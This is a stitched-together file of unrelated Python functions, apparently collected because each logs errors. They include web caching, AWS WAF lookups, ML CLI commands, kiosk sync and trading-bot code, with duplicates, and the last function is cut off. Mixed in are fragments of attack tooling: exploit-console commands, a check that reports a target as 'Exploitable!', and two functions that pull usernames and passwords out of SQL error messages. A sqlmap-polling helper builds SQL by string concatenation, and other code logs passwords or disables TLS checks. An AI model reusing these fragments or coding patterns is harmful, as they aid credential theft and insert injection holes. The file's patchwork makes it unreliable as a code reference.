def content(userName='', accessLevel='', newUrl='', command='', queryString='',
            postData='', cookies='', uploadFile=''):
    ''' What this module does? '''
    #==> extracting keys from queryString
    #==> key = utils.getKey( queryString )
    cacheFile = cache.cacheFile('_____', module)  # ==> cache.cacheFile( key, module )

    # searching for cached data
    noCache = 0
    data = ''
    if ENABLECACHING == 1:
        # valid cache found, loading data from cache
        try:
            cacheStream = open(cacheFile, 'r')
            data = pickle.load(cacheStream)
            cacheStream.close()
        except IOError:
            logger.error('failed to load cacheFile: \'%s\'' % cacheFile)
            noCache = 1  # needs to load data
    else:
        noCache = 1  # needs to load data
    if len(data) == 0:
        noCache = 1

    if noCache:
        # no or out-of-date cache, building a new one
        data = buildData(1)
        # creating cache
        if ENABLECACHING == 1:
            try:
                cacheStream = open(cacheFile, 'w')
                pickle.dump(data, cacheStream)
                cacheStream.close()
            except IOError:
                logger.error('failed to save cacheFile: \'%s\'' % cacheFile)

    returnStatus = "200 OK"
    cnt = buildHtml(data, accessLevel)
    responseHeaders = [("Content-Type", CONTENT_HTML),
                       ("Content-Length", str(len(cnt)))]
    return responseHeaders, returnStatus, cnt
def read(path, name, extension='html', access=RO_ACCESS):
    ''' read() tries to load the selected template and returns its content. '''
    fullPath = os.path.join(
        path,
        str(name) + ('' if len(extension) and extension[0] == '.' else '.') + extension)
    if os.path.exists(fullPath):
        logger.debug(' loading template file at \'%s\'' % fullPath)
        cnt = ''
        try:
            fileObject = open(fullPath, 'r')
            cnt = fileObject.read()
            fileObject.close()
            if access == RO_ACCESS:
                cnt = REGEXP.sub('', cnt)
        except IOError:
            logger.error(' can\'t access template file: \'%s\'' % fullPath)
        return cnt
    else:
        logger.error(' template file doesn\'t exist: \'%s\'' % fullPath)
        return ''
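# A minimal usage sketch for read() above, assuming a templates/ directory
# next to the module and the module-level RO_ACCESS constant; 'header' is an
# illustrative template name.
html = read('templates', 'header', extension='html', access=RO_ACCESS)
if html:
    logger.debug('template loaded, %d bytes' % len(html))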
def waf_ipset_ranges(_id):
    """Retrieves all ranges associated with an IPSet id."""
    trace = "aws#waf_ipset_ranges"
    info("Enter", trace, {"id": _id})

    client = boto3.client("waf")
    ranges = []
    response = None
    try:
        response = client.get_ip_set(IPSetId=_id)
    except Exception as e:
        error("Failed to determine ipset", trace, {
            "id": _id,
            "error": e,
        })
        raise e
    info("Determined ipset", trace, {"ipset": response})

    for descriptor in response["IPSet"]["IPSetDescriptors"]:
        info("Examining descriptor", trace, {"descriptor": descriptor})
        ranges.append(descriptor["Value"])

    info("Determined ranges associated with ipset id", trace, {
        "id": _id,
        "ranges": ranges,
    })
    info("Exit", trace, {"returns": ranges})
    return ranges
def image_dir(ctx, **kwargs):
    """Predict data using the selected model on a set of images."""
    if not models.model_exists(kwargs['model']):
        raise click.UsageError("Model '{0}' does not exist.".format(
            kwargs['model']), ctx=ctx)
    if not weights.weights_exist(kwargs['model'], kwargs['iteration']):
        raise click.UsageError(
            "Model '{0}' (iteration: '{1}') does not exist.".format(
                kwargs['model'], kwargs['iteration']), ctx=ctx)
    ctx.obj['model'] = kwargs['model']
    ctx.obj['weights'] = (kwargs['model'], kwargs['iteration'])

    logger.info('Scanning for images in `{0}`.'.format(kwargs['input']))
    lst = []
    for f in os.listdir(kwargs['input']):
        f_path = os.path.join(kwargs['input'], f)
        if not lib.utils.valid_image(f_path):
            continue
        lst.append(f_path)
    lst.sort()
    logger.info('Found {0} images in directory.'.format(len(lst)))

    X = []
    with click.progressbar(label='Loading images...', length=len(lst),
                           show_pos=True) as pbar:
        for im in lst:
            im = lib.utils.load_image(im)
            X.append(im)
            pbar.update(1)
    X = np.array(X)

    logger.info('Prediction starts.')
    try:
        Y = lib.tf.predict(X, ctx.obj['model'], ctx.obj['weights'])
    except Exception:
        logger.error("Unrecoverable error.", exc_info=True)
        exit(1)

    logger.debug("min(Y)={0}, max(Y)={1}, avg(Y)={2}, var(Y)={3}".format(
        np.min(Y), np.max(Y), np.average(Y), np.var(Y)))
    logger.debug("Y.shape={0}, Y.dtype={1}".format(Y.shape, Y.dtype))

    with click.progressbar(label='Saving images...', length=len(Y),
                           show_pos=True) as pbar:
        i = 0
        for im in Y:
            im = lib.utils.save_image(
                os.path.join(kwargs['output'], os.path.basename(lst[i])), im)
            pbar.update(1)
            i += 1
    logger.info('Completed predictions on {0} images.'.format(len(Y)))
def default(self, line):
    """
    Called when the command cannot be recognized.
    :param line: the raw input line
    :return:
    """
    logger.error("Unknown command: %s" % line)
def update_data_bulk(self, table, db_id, data):
    """
    Updates the test case data in bulk in the corresponding table.

    - **parameters**, **types**, **return** and **return types**::

        :param table: database table object.
        :type table: database class
        :param db_id: db_id.
        :type db_id: integer
        :param data: test case data to be modified.
        :type data: dictionary
        :return: True
    """
    try:
        self.db.query(table).filter_by(id=db_id).update(data)
    except sqlalchemy.exc.StatementError as err:
        logger.error(data)
        raise Exception(err)
    except Exception as err:
        logger.warn(err)
        try:
            self.db = db()
            self.db.query(table).filter_by(id=db_id).update(data)
        except Exception as err:
            logger.warn('DB connection failed')
            logger.error(err)
            raise Exception(err)
    self.db.commit()
    self.db.close()
    return True
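# Hypothetical call of update_data_bulk() above; dao stands in for an
# instance of the surrounding class, TestCase for a mapped SQLAlchemy table
# class, and 42 for an existing row id.
dao.update_data_bulk(TestCase, 42, {'status': 'passed'})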
def processLeafNode(xmlNode, parentNodeNames):
    ''' Processes a leaf node of the XML structure and returns a dictionary with the performance data '''
    l.logEntryExit("Entering: parentNodeNames: '%s'; xmlNode: '%s', xmlNode.tag: '%s'"
                   % (str(parentNodeNames), xmlNode.get("name"), xmlNode.tag))
    statsDataDict = {}
    statisticDataDictList = []
    ##
    ## Check all available statistics
    for statClassification in STATISTIC_CLASSIFICATION_LIST:
        l.debug("Checking for statistic classification: '%s'" % (statClassification))
        xPathString = "./" + statClassification
        for statistics_node in xmlNode.findall(xPathString):
            l.debug("Processing node: '%s'" % (statistics_node.get("name", "N/A")))
            statisticDataDict = {}
            ##
            ## Depending on the node tag we have to build the dictionary
            if statistics_node.tag in STATISTIC_CLASSIFICATION_LIST:
                statisticDataDict = buildDictFromXmlNode(statistics_node)
            else:
                l.error("Invalid tag of XML node found: '%s'. Exiting ..." % (statistics_node.tag))
                sys.exit(1)
            ##
            ## Append statistic data to the returned list
            statisticDataDictList.append(statisticDataDict)
    ##
    ## Create a dictionary to include the tags and the data
    statsDataDict["tags"] = parentNodeNames
    statsDataDict["perfdata"] = statisticDataDictList
    jsonStats = json.dumps(statsDataDict)
    l.debug("Return list for node '%s' as JSON: '%s'" % (xmlNode.get("name"), str(jsonStats)))
    l.debug("Returned dictionary for node '%s': '%s'" % (xmlNode.get("name"), str(statsDataDict)))
    return statsDataDict
def connectSwitch(self, host_ip, u_name, p_word, tc_name):
    """
    Connects to the switch over SSH and verifies it is reachable.

    - **parameters**, **types**, **return** and **return types**::

        :param host_ip: switch host IP
        :param u_name: switch username
        :param p_word: switch password
        :param tc_name: test case name, used in the skip message
        :type host_ip: string
        :type u_name: string
        :type p_word: string
        :type tc_name: string
    """
    port = 22
    client = paramiko.SSHClient()
    try:
        client.load_system_host_keys()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        logger.info('*** Connecting to Switch...')
        client.connect(host_ip, port, u_name, p_word)
        stdin, stdout, stderr = client.exec_command('version')
        client.close()
    except Exception:
        msg = "Unable to connect to Switch. Hardware requirement failed. " \
              "Hence skipping test case {}".format(tc_name)
        logger.error(msg)
        notify.message(msg)
        raise Exception(msg)
def do_exploit(self, line):
    if self.current_plugin:
        rn = self.plugin_exec()
        if not rn[0]:
            logger.error(rn[1])
    else:
        logger.error("Select a plugin first.")
def writeToInflux(parmInfluxUrl, parmInfluxDb, parmTargetUser, parmTargetPwd, perfList, whitelistDict):
    ''' writes the data to the influx DB using the write REST API '''
    l.debug("writeToInflux with the following parameters: \nparmInfluxUrl: '%s'\n parmInfluxDb: '%s'\n parmTargetUser: '%s'\n parmTargetPwd: '%s'\n len(perfList): '%s'"
            % (parmInfluxUrl, parmInfluxDb, parmTargetUser, parmTargetPwd, len(perfList)))
    try:
        (urlSchema, urlHost, urlPort) = o.splitHttpUrlString(parmInfluxUrl)
    except Exception as e:
        raise Exception, sys.exc_info()[1]
    ##
    ## influxdb write end-point with query string
    tmpUri = "/write"
    tmpUri += o.buildQueryString(db=parmInfluxDb, precision="ms", p=parmTargetPwd, u=parmTargetUser)
    l.debug("Uri to /write Influx: '%s'" % (tmpUri))
    postHeaders = {"Content-type": "text/plain; charset=utf-8", "Accept": "text/plain"}
    ##
    ## Number of rows inserted
    rowCount = 0
    ##
    ## Format the output as a string
    data = outputFormatter(perfList, outFormat="INFLUX", whitelistDict=whitelistDict)
    l.verbose("formatted influx data: \n%s", data)
    ##
    ## outputFormatter returns a string of the data separated by \n per line
    postDataDict = data.split("\n")
    ##
    ## Iterate over the perfList and build the REST API string.
    ## The "tags" is a string of tags separated by NODE_SEPARATOR and the counters will be the fields
    for postData in postDataDict:
        l.debug("POST data for write end-point: '%s'" % (postData))
        try:
            ##
            ## Get the HTTP connection
            httpConn = o.getHttpConnection(urlSchema, urlHost, urlPort)
            httpConn.request("POST", tmpUri, postData, postHeaders)
            httpResponse = httpConn.getresponse()
            responseData = httpResponse.read()
            httpConn.close()
            rowCount += 1
        except Exception as e2:
            httpConn.close()
            errorString = "Failed to write data to influx, '%s'" % (e2.strerror)
            raise Exception, errorString
        ##
        ## influxDb write returns code 204
        if (httpResponse.status != httplib.NO_CONTENT):
            l.error("Error response data: '%s'" % (responseData))
            errorString = "Write to influx db failed with status code: '%d'" % (httpResponse.status)
            l.error(errorString)
            httpConn.close()
            raise Exception, errorString
        else:
            l.debug("influx URL ping returned status code: '%d'", httpResponse.status)
    ##
    ## Finished - close the connection
    httpConn.close()
    l.info("writeToInflux: Number of rows inserted: '%d'" % (rowCount))
def verify(URL):
    r = requests.get(URL)
    r.close()
    if "Request" in r.content:
        logger.success("Step 1: Exploitable!")
    else:
        logger.error("Step 1: It's not exploitable!")
def __init__(self):
    """parse sync app config"""
    sync_conf = self.get_config()
    if len(sync_conf) == 0:
        logger.error('invalid sync config file')
        sys.exit(-1)
    sync_conf.update(unibox.kiosk_conf)
    self.conf = sync_conf
    self.server_host = self.conf['sync_server']
    self.kiosk_id = self.conf['kioskid']
    self.owner_id = self.conf['ownerid']

    # sync app request uris
    self.uri_map = {
        'ad': self.server_host + '?m=Api&c=Sync&a=ad',
        'title': self.server_host + '?m=Api&c=Sync&a=title',
        'movie': self.server_host + '?m=Api&c=Sync&a=movie',
        'movie_en': self.server_host + '?m=Api&c=Sync&a=movie_en',
        'inventory': self.server_host + '?m=Api&c=Sync&a=inventory',
        'kiosk_info': self.server_host + '?m=Api&c=Sync&a=kiosk&ownerId='
                      + self.owner_id + '&kioskId=' + self.kiosk_id,
        'slot': self.server_host + '?m=Api&c=Sync&a=slot'
    }

    self.db = lib.sqlite.Db(self.sandbox_dir + self.conf['local_db'])
    self.tmp_folder = self.sandbox_dir + self.conf['local_tmp']
def clone_repo(repo: str, location: Union[Path, str]):
    """Clone a repo to a specified location.

    Parameters
    ----------
    repo : str
        Repo name.
    location : Union[Path, str]
        Location to clone the repo to.
    """
    # Format clone command
    cmd = [
        'git', 'clone', '--depth=1',
        f'https://github.com/{repo}.git', str(location)
    ]

    # Clone
    try:
        subprocess.run(
            cmd, check=True,
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
        )
    except subprocess.CalledProcessError:
        logger.error(f'Failed to clone repo {repo}')
        raise
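# Example use of clone_repo() above: shallow-clone a public repository into a
# temporary directory; the repo name is illustrative.
import tempfile
from pathlib import Path

target = Path(tempfile.mkdtemp()) / 'hello-world'
clone_repo('octocat/Hello-World', target)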
def main(argv, is_local=True):
    # exit if there is no receiver
    if not config.TELEGRAM_IDS_SUBSCRIBER:
        logger.error("No Telegram IDs to notify")
        return

    # initialize
    last_prices = {c.HOURLY: all_exchanges(), c.EVENT: all_exchanges()}

    # get the last prices and notify
    while True:
        is_periodic = utils.true_every_1_hour()
        current_prices = all_exchanges()
        logger.info(current_prices)

        msg, last_prices, has_events_to_notify = voila(current_prices, last_prices, is_periodic)
        if is_periodic:
            # hourly notification
            notify.to_subscribers(msg)
        elif has_events_to_notify:
            # by prices and percent changes
            notify.to_premiums(msg)

        # check every minute
        time.sleep(c.ONE_MIN_IN_SEC)
def content(userName='', accessLevel='', newUrl='', command='', queryString='',
            postData='', cookies='', uploadFile=''):
    ''' What this module does? '''
    cacheFile = cache.cacheFile('_____', module)  # ==> cache.cacheFile( key, module )

    # searching for cached data
    noCache = 0
    data = ''
    if ENABLECACHING == 1:
        # valid cache found, loading data from cache
        try:
            cacheStream = open(cacheFile, 'r')
            data = pickle.load(cacheStream)
            cacheStream.close()
        except IOError:
            logger.error('failed to load cacheFile: \'%s\'' % cacheFile)
            noCache = 1  # needs to load data
    else:
        noCache = 1  # needs to load data
    if len(data) == 0:
        noCache = 1

    if noCache:
        # no or out-of-date cache, building a new one
        data = buildData(userName)  #==> to be replaced with a specific call
        # creating cache
        if ENABLECACHING == 1:
            try:
                cacheStream = open(cacheFile, 'w')
                pickle.dump(data, cacheStream)
                cacheStream.close()
            except IOError:
                logger.error('failed to save cacheFile: \'%s\'' % cacheFile)

    returnStatus = "200 OK"
    #==> build content using the selected filter
    cnt = buildHtml(data)
    responseHeaders = [("Content-Type", CONTENT_HTML),
                       ("Content-Length", str(len(cnt)))]
    return responseHeaders, returnStatus, cnt
def push_content(self):
    logger.debug('call: ubuntupaste.push_content')
    conf = config.getConfig()
    post_target = 'http://paste.ubuntu.com/'
    logger.debug('post target: ' + post_target)
    poster = conf.get('ubuntu.user', getpass.getuser())
    logger.debug('poster: ' + poster)
    # Get filename for highlighting.
    filename = conf.require('src').name
    if filename == '-':
        print 'Type your content here, end with EOF'
        print 'Use Ctrl-C to interrupt, if you have mistyped something.'
    try:
        content = conf.require('src').read()
    except KeyboardInterrupt:
        logger.warn('Ctrl-C received, interrupted...')
        sys.exit(1)
    lines = content.count('\n')
    bytes = len(content)
    logger.info('content: %d lines, %d bytes' % (lines, bytes))
    lang = conf.get('ubuntu.lang', _get_language(filename))
    logger.debug('highlight: ' + lang)
    post_data = {
        'poster': poster,
        'syntax': lang,
        'content': content,
    }
    try:
        resp = self.req.post(post_target, data=post_data, allow_redirects=False)
    except exceptions.RequestException as e:
        logger.info('Exception: ' + e.__class__.__name__)
        logger.error('Something went wrong when communicating with paste.ubuntu.com!')
        raise exception.ServerException(e)
    logger.debug('HTTP OK')
    logger.info('HTTP Status: %d %s' % (resp.status_code, resp.reason))
    if resp.status_code == 302:
        pastepad = resp.headers['location']
        logger.debug('location: ' + pastepad)
        pattern = re.compile(r'^http:\/\/paste.ubuntu.com/(?P<paste_id>\d+)/$')
        res = pattern.match(pastepad)
        if not res:
            raise exception.ServerException('Unknown location: ' + pastepad)
        paste_id = res.group('paste_id')
        logger.info('paste_id: ' + paste_id)
        print 'Paste ID: ' + str(paste_id)
        print 'HTTP Link: ' + pastepad
        return
    if resp.status_code == 200:
        err_start_flag = '<ul class="errorlist"><li>'
        err_stop_flag = '</li></ul>'
        msg = self.html2text(self.fetch_between(resp.content, err_start_flag, err_stop_flag))
        raise exception.ServerException('Server refused our paste: ' + msg)
    raise exception.ServerException('Server responded with unknown status %d %s'
                                    % (resp.status_code, resp.reason))
def fileDate(filePath):
    ''' returns the mtime of the file '''
    if not os.path.exists(filePath):
        logger.error("failed to determine last modified date; path '%s' does not exist" % filePath)
        return -1
    return float(os.path.getmtime(filePath))
def TQ(self, sql, args=None):
    try:
        self.get_conn(auto_commit=False)
        rs = self.cur.execute(sql, args)
        return rs
    except pymysql.Error as e:
        error("_query error: %s %s", sql, args, exc_info=True)
        raise e
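# Sketch of a parameterized query through TQ() above; Db is a stand-in name
# for the wrapper class, the table comes from the add_user() snippet later in
# this file, and the uid is illustrative.
db = Db()
db.TQ("SELECT salt FROM o_user_basic WHERE uid = %s", (42,))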
def waf_ipsets_ids(_id):
    """Retrieves all IPSet ids associated with a waf web acl.

    To do so we must follow node relationships, from waf web-acl,
    to waf rule, to ipsets.
    """
    trace = "aws#waf_ipsets_ids"
    info("Enter", trace, {
        "id": _id,
    })

    ids = []
    client = boto3.client("waf")
    response = None
    try:
        response = client.get_web_acl(WebACLId=_id)
    except Exception as e:
        error("Failed to retrieve waf web-acl", trace, {
            "id": _id,
            "error": e,
        })
        raise e
    info("Determined waf web-acl", trace, {
        "web_acl": response,
    })

    for rule in response["WebACL"]["Rules"]:
        info("Examining rule", trace, {
            "rule": rule,
            "id": rule["RuleId"],
        })
        try:
            rule_response = client.get_rule(RuleId=rule["RuleId"])
        except Exception as e:
            error("Failed to determine rule", trace, {
                "id": rule["RuleId"],
                "error": e,
            })
            raise e
        info("Determined rule object", trace, {"rule": rule_response})

        # filter out IPMatch predicate ids, accumulating across rules
        ids += [
            predicate["DataId"]
            for predicate in rule_response["Rule"]["Predicates"]
            if predicate["Type"] == "IPMatch"
        ]

    info("Determined ipset ids associated with web acl", trace, {
        "acl": _id,
        "ids": ids,
    })
    info("Exit", trace, {"returns": ids})
    return ids
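# Sketch chaining the two WAF helpers above to resolve every CIDR range
# behind a (classic) WAF web ACL; the ACL id is illustrative.
acl_id = "example-web-acl-id"
cidr_ranges = []
for ipset_id in waf_ipsets_ids(acl_id):
    cidr_ranges.extend(waf_ipset_ranges(ipset_id))
info("Resolved ranges", "aws#example", {"ranges": cidr_ranges})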
def main(event, context):
    try:
        _tickers = event.get("tickers")
        _position_size = event.get("position-size")
        _strategy = event.get("strategy")
        account_alias = event.get("account-alias")

        kms = Kms()
        session = get_session()
        if environ.get("STAGE") == "test":
            wait_for_db_init(session)

        candle_repository = CandleRepository(session)
        account_repository = AccountRepository(session, kms)
        order_repository = OrderRepository(session)

        accounts = account_repository.get_all_active_upbit_accounts(alias=account_alias)
        db_feed = DbFeed(exchange=UpbitExchange.build(accounts[0]),
                         candle_repository=candle_repository)

        tickers = _tickers or get_trading_tickers()
        strategy = get_strategy_by_name(name=_strategy)

        feeds_by_ticker = db_feed.build_feeds_by_ticker(tickers=tickers)
        strategies_by_ticker = get_trading_strategies_by_ticker(tickers=tickers,
                                                                override_strategy=strategy)

        logger.info(f"accounts = {accounts}")

        orders = []
        for account in accounts:
            send_credential_expiry_reminder(account)

            exchange = UpbitExchange.build(account)
            asset_manager = AssetManager(exchange)
            trader = Trader(asset_manager, exchange, session, account, order_repository)

            for ticker, strategies in strategies_by_ticker.items():
                for strategy in strategies:
                    logger.info(f"trading with strategy = {strategy}, ticker = {ticker}")
                    wait_order = trader.trade(ticker=ticker,
                                              strategy=strategy(feeds_by_ticker[ticker]),
                                              position_size=_position_size)
                    if wait_order is not None:
                        orders.append(wait_order)

        return {
            "statusCode": 200,
            "body": ",".join([order.get_id() for order in orders])
        }
    except Exception as e:
        stack = traceback.format_exc()
        logger.error(e)
        return {
            "statusCode": 500,
            "body": stack
        }
def do_use(self, plugin):
    if plugin:
        try:
            self.plugin_load(plugin)
        except Exception, e:
            print e
            logger.error("Failed to load plugin: %s" % plugin)
        if self.current_plugin:
            self.prompt = " %s >" % self.current_plugin
def kfold(ctx, **kwargs):
    """Run K-Fold validation on the selected model."""
    if not models.model_exists(kwargs['model']):
        raise click.UsageError("Model '{0}' does not exist.".format(
            kwargs['model']), ctx=ctx)
    model = models.load_model(kwargs['model'])

    options = {
        'batch_size': kwargs['batch_size'],
        'epochs': kwargs['epochs'],
        'learning_rate': kwargs['learning_rate']
    }
    flags = ['no-save']
    if kwargs['no_early_stopping'] is True:
        flags.append('no-early-stopping')

    seed = lib.tf.set_seed(kwargs['seed'])
    dataset = load_dataset(kwargs['dataset'], kwargs['batch_size'], flags, seed)
    kfold = sklearn.model_selection.KFold(n_splits=kwargs['k_value'],
                                          shuffle=True, random_state=seed)

    fold_no = 1
    metrics_all = []
    for idx_train, idx_test in kfold.split(dataset):
        try:
            logger.info("Current process memory usage: {0:.3f} MB.".format(
                resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / (10**3)))
            logger.info("Training run {0}/{1}.".format(fold_no, kwargs['k_value']))
            ds_train = dataset.slice(idx_train)
            ds_test = dataset.slice(idx_test)
            model_nn, metrics = lib.tf.train(kwargs['model'], ds_train, ds_test,
                                             None, seed, flags, options)
            metrics_all.append(metrics)
        except Exception:
            logger.error("Unrecoverable error.", exc_info=True)
            exit(1)
        fold_no += 1

    logger.info("Averaged metrics:")
    final_metrics = np.average(metrics_all, axis=0)
    model.metrics(final_metrics, logger)
    final_metrics_std = np.std(metrics_all, axis=0)
    for i, std in enumerate(final_metrics_std):
        logger.info('STD ({0}): {1:.6f}'.format(i, std))
def sync_kiosk(self):
    sync_start = time.time()
    req_url = self.uri_map['kiosk_info']
    if self.force_sync is True:
        self.db.execute("DELETE FROM kiosk")
    version_num = self.db.get_max_version('kiosk', seq_field='kiosk_id')
    req_url = lib.inet.encode_url(req_url, {'version_num': version_num})
    logger.info('sync kiosk info from ' + req_url)
    json_data = lib.inet.fetch_data(req_url)
    if json_data is None or len(json_data) == 0:
        self.update_ini()
        logger.info('already updated, end sync')
        return
    if type(json_data) is tuple and json_data[0] == '[err]':
        # failed to fetch data
        logger.error(str(json_data))
        return

    # delete kiosks other than this kiosk_id
    # del_kiosk = db.execute("DELETE FROM kiosk WHERE kiosk_id != " + items.kiosk_id)
    # logger.info('removed ' + str(del_kiosk) + ' kiosks which kioskId != ' + items.kiosk_id)

    # begin updating kiosk
    field = [
        'kiosk_id', 'owner_id', 'kiosk_name', 'indoor', 'machine_serial',
        'kiosk_model', 'kiosk_image', 'kiosk_status', 'state_code',
        'city_name', 'location', 'reg_date', 'close_date',
        'remote_service_ip', 'remote_service_port', 'remote_service_password',
        'remote_ip', 'remote_port', 'remote_password', 'tax_rate', 'address',
        'zipcode', 'remark', 'latitude', 'longitude', 'version_num'
    ]
    data_kiosk = {}
    if type(json_data) is dict:
        json_data = [json_data]
    for r in json_data:
        item = {}
        for key in field:
            if key in r:
                if key == 'kiosk_id' and r[key] == '':
                    continue
                else:
                    item[key] = r[key]
            else:
                item[key] = ''
        data_kiosk[r['kiosk_id']] = item

    field, params = lib.util.unpack_data(data_kiosk)
    aff_rows = self.db.replace_many('kiosk', field, params)
    logger.info('end sync kiosk_info, updated ' + str(aff_rows) + ' rows of kiosk')
    self.update_ini()
    sync_end = time.time()
    logger.info('time elapsed ' + str(sync_end - sync_start) + 'sec\n')
def do_search(self, keyword):
    if keyword:
        print "\nMatching EXPs\n=============\n"
        print "%-40s%-40s%s" % ("Name", "Scope", "Description")
        print "%-40s%-40s%s" % ("----", "-------", "-----------")
        for name, scope, description in self.search_plugin(keyword):
            print "%-40s%-40s%s" % (name, scope, description)
        print
    else:
        logger.error("search <keyword>")
def getNodes(wasCellName, root):
    ''' Returns a list of performance records '''
    l.logEntryExit("Entering: root: '%s'; wasCellName: '%s'" % (str(root), wasCellName))
    nodeName = None
    serverName = None
    statName = None
    parentNodeNames = ""
    statRtnList = []
    ##
    ## Check for a valid file via the root node tag (PerformanceMonitor)
    l.debug("XML tag of the root node is: '%s'" % (root.tag))
    if (root.tag == "PerformanceMonitor"):
        responseStatus = root.get('responseStatus')
        if (responseStatus != 'success'):
            l.error("PerformanceMonitor responseStatus indicates an invalid file!")
        else:
            l.verbose("PerformanceMonitor responseStatus indicates a valid file!")
    ##
    ## process sub-nodes
    for nodeNode in root.findall("./Node"):
        l.verbose("Processing xmlNode.tag: '%s'" % (nodeNode.tag))
        parentNodeNames += wasCellName
        ##
        ## Node nodes
        if (nodeNode.tag == "Node"):
            nodeName = nodeNode.get('name')
            parentNodeNames += NODE_SEPARATOR
            parentNodeNames += nodeName
            l.debug("nodeName set to: '%s'" % (nodeName))
            ##
            ## Server nodes
            for serverNode in nodeNode.findall("./Server"):
                if (serverNode.tag == "Server"):
                    serverName = serverNode.get('name')
                    parentNodeNames += NODE_SEPARATOR
                    parentNodeNames += serverName
                    l.debug("serverName set to: '%s'" % (serverName))
                    ##
                    ## Get all Stats nodes of the server node
                    for statNode in serverNode.findall("./Stat"):
                        if (statNode.tag == "Stat"):
                            statName = statNode.get('name')
                            l.debug("Found child node with name: '%s'" % (statNode.get("name")))
                            debugList = getStatsData(parentNodeNames, statNode)
                            statRtnList += debugList
                            l.debug("JSON-0 debugList: '%s'" % (str(json.dumps(debugList))))
                            l.debug("JSON-1 statRtnList: '%s'" % (str(json.dumps(statRtnList))))
        else:
            l.debug("Expected nodeNode.tag to be \"Node\" but got: '%s'" % (nodeNode.tag))
    return statRtnList
def validate_hitachi_software(self, ip, u_name, pwd, model, serial_number,
                              port, licenses, tcname):
    """
    Connects to a Hitachi array and checks for license existence.

    - **parameters**, **types**, **return** and **return types**::

        :param ip: Hitachi array IP
        :param u_name: Hitachi array username
        :param pwd: Hitachi array password
        :param licenses: list of licenses to be checked
        :type ip: string
        :type u_name: string
        :type pwd: string
        :type licenses: list
        :return: Returns None
    """
    base_URL = "https://" + ip + ":" + str(port) + "/ConfigurationManager" + \
               "/v1/objects/storages/"
    try:
        logger.info('*** Connecting to Hitachi Array...')
        resp = requests.get(base_URL, auth=(u_name, pwd), verify=False)
        data = resp.json()
        for array in data['data']:
            if array['model'] == model and \
                    array['serialNumber'] == int(serial_number):
                sdid = array['storageDeviceId']
                logger.info('connection to Hitachi successful, '
                            'hence starting test case execution.')
                url = base_URL + sdid + '/' + 'licenses'
                resp = requests.get(url, auth=(u_name, pwd), verify=False)
                out = resp.json()
                for dev in out['data']:
                    for pro in licenses:
                        if dev['programProductName'] == pro:
                            if dev['status'] == 'Installed':
                                msg = "Required Software {} is installed".format(pro)
                                logger.info(msg)
                            else:
                                msg = ('Required software {} is {}. Hence skipping the '
                                       'test case {}...'.format(pro, dev['status'], tcname))
                                raise Exception(msg)
            else:
                msg = "Provided Hitachi model is not registered with " \
                      "rest server / Management server"
                logger.error(msg)
                raise Exception(msg)
    except Exception as err:
        notify.message(str(err))
        logger.error(err)
        raise Exception(err)
def info(self, arg):
    try:
        data = re.sub('[\'\"]', ' ',
                      str(requests.get("http://127.0.0.1:8775/scan/" + arg + "/data").json()['data']))
        if data != "":
            self.cu.execute("UPDATE info SET DATA='" + str(data) + "' WHERE SESSION='" + str(arg) + "';")
            self.conn.commit()
            return data
        else:
            return "No data"
    except:
        logger.error("Query error")
def do_exploit(self, line):
    """
    Run the currently selected plugin.
    :return:
    """
    if self.current_plugin:
        rn = self.exec_plugin()
        if not rn[0]:
            logger.error(rn[1])
    else:
        logger.error("Select a plugin first.")
def get_hash(url):
    r = requests.get(url)
    r.close()
    try:
        result = re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1)
        username = result.split("|")[1]
        password = result.split("|")[2]
        return (username, password)
    except:
        logger.error("Finish! Can't get hash!\nBut you can try it by hand!\n")
def get_hash(url):
    r = requests.get(url)
    r.close()
    try:
        result = re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1)
        username = result.split("|")[1]
        password = result.split("|")[2]
        logger.success("Step 2:")
        return (username, password)
    except:
        logger.error("Step 2: Finish! It's not exploitable!\n"
                     "If step 1 is exploitable, you can try it by hand!\n")
def getStatsData(parentNodeNames, xmlNode):
    ''' Returns the recursive stats records from the current node.
        Note: The result is a list of dictionaries '''
    l.logEntryExit("Entering: parentNodeNames: '%s'; xmlNode: '%s'"
                   % (str(parentNodeNames), xmlNode.get("name")))
    parentNodeNames += NODE_SEPARATOR
    parentNodeNames += xmlNode.get("name")
    l.debug("Added to parentNodeNames: '%s'. New parentNodeNames is:\n '%s'"
            % (xmlNode.get("name"), str(parentNodeNames)))
    ##
    ## Do we have sub statistics?
    subStatNode = xmlNode.find("./Stat")
    if (subStatNode != None):
        subStatNodeList = []
        ##
        ## process all sub Stat nodes
        for subStatNode in xmlNode.findall("./Stat"):
            subStatNodeName = subStatNode.get("name")
            l.debug("processing subStatNode: '%s'" % (subStatNodeName))
            getStatsDataResult = getStatsData(parentNodeNames, subStatNode)
            l.debug("Returning from recursion; getStatsDataResult is: '%s'"
                    % (str(json.dumps(getStatsDataResult))))
            if (isinstance(getStatsDataResult, DictType)):
                subStatNodeList.append(getStatsDataResult)
            elif (isinstance(getStatsDataResult, ListType)):
                subStatNodeList += getStatsDataResult
            else:
                l.error("Type of returned getStatsDataResult is invalid. Exiting ...")
                ## l.error("Got '%s' back" % (str(getStatsDataResult)))
                sys.exit(1)
        ##
        ## Some PMI data objects contain accumulated values as well (like for example JDBC Provider)
        subNodeStatsDict = processLeafNode(xmlNode, parentNodeNames)
        l.debug("Statistics dictionary for Stat node: '%s'" % (str(subNodeStatsDict)))
        ##
        ## We add the dictionary to the returned list only if there are data
        if (len(subNodeStatsDict["perfdata"]) > 0):
            l.debug("appending subNodeStatsDict: '%s'" % (str(json.dumps(subNodeStatsDict))))
            subStatNodeList.append(subNodeStatsDict)
        return subStatNodeList
    else:
        ##
        ## No sub Stat nodes --> a leaf was found.
        l.debug("Leaf node: '%s' found" % (xmlNode.get("name")))
        subStatNodeList = []
        leafNodeResult = processLeafNode(xmlNode, parentNodeNames)
        ##
        ## We return a list!
        subStatNodeList.append(leafNodeResult)
        return subStatNodeList
def do_stop(self, arg):
    try:
        if self.start_status:
            Sniff.sniff_stop(self.m)
            self.prompt = "[*]Sniffer->"
            logger.info("Paused")
            self.start_status = False
        else:
            logger.error('Sniff is not running')
    except Exception, e:
        print e
        logger.error("Failed to pause Sniff")
def _perform_auth(self, otp_token=None):
    if otp_token is None:
        try:
            self.user = raw_input('Username: ')
            logger.debug('user: ' + self.user)
            self.pwd = getpass.getpass('Password: ')
            logger.debug('password ok.')
        except KeyboardInterrupt:
